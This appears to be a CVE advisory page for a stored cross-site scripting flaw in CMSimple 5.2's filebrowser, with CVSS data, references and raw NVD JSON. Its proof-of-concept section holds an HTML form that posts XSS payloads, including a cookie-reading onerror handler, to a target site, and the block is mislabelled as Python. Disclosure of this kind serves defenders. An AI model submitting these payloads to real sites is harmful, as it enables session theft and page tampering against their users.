CVE-2021-47732

Description

CMSimple 5.2 contains a stored cross-site scripting vulnerability in the Filebrowser External input field that allows attackers to inject malicious JavaScript. Attackers can place unfiltered JavaScript code that executes when users click on Page or Files tabs, enabling persistent script injection.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cmsimple:cmsimple:5.2:*:*:*:*:*:*:* - VULNERABLE

CMSimple 5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2021-47732 Stored XSS PoC for CMSimple 5.2 Filebrowser External Input -->
<!-- Author: VulnCheck -->

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2021-47732 PoC</title>
</head>
<body>
    <h1>CVE-2021-47732 Stored XSS in CMSimple 5.2</h1>
    
    <form action="[TARGET_URL]/cmsimple/filebrowser.php" method="POST">
        <input type="hidden" name="external" value='<script>alert("XSS - CVE-2021-47732")</script>'>
        <input type="hidden" name="action" value="save">
        <input type="submit" value="Exploit">
    </form>

    <!-- Alternative PoC using event handler -->
    <form action="[TARGET_URL]/cmsimple/filebrowser.php" method="POST">
        <input type="hidden" name="external" value='<img src=x onerror="alert(document.cookie)">'>
        <input type="hidden" name="action" value="save">
        <input type="submit" value="Exploit (Cookie Theft)">
    </form>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47732
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47732
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47732/
[4] VulDB https://vuldb.com/cve/CVE-2021-47732
[5] https://www.cmsimple.org/en/
[6] https://www.exploit-db.com/exploits/49751
[7] https://www.vulncheck.com/advisories/cmsimple-stored-cross-site-scripting-via-filebrowser-external-input

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47732", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.823", "lastModified": "2026-01-05T14:15:51.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CMSimple 5.2 contains a stored cross-site scripting vulnerability in the Filebrowser External input field that allows attackers to inject malicious JavaScript. Attackers can place unfiltered JavaScript code that executes when users click on Page or Files tabs, enabling persistent script injection."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple:cmsimple:5.2:*:*:*:*:*:*:*", "matchCriteriaId": "999113DA-2ADD-4068-9157-22A7D13200E6"}]}]}], "references": [{"url": "https://www.cmsimple.org/en/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49751", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/cmsimple-stored-cross-site-scripting-via-filebrowser-external-input", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}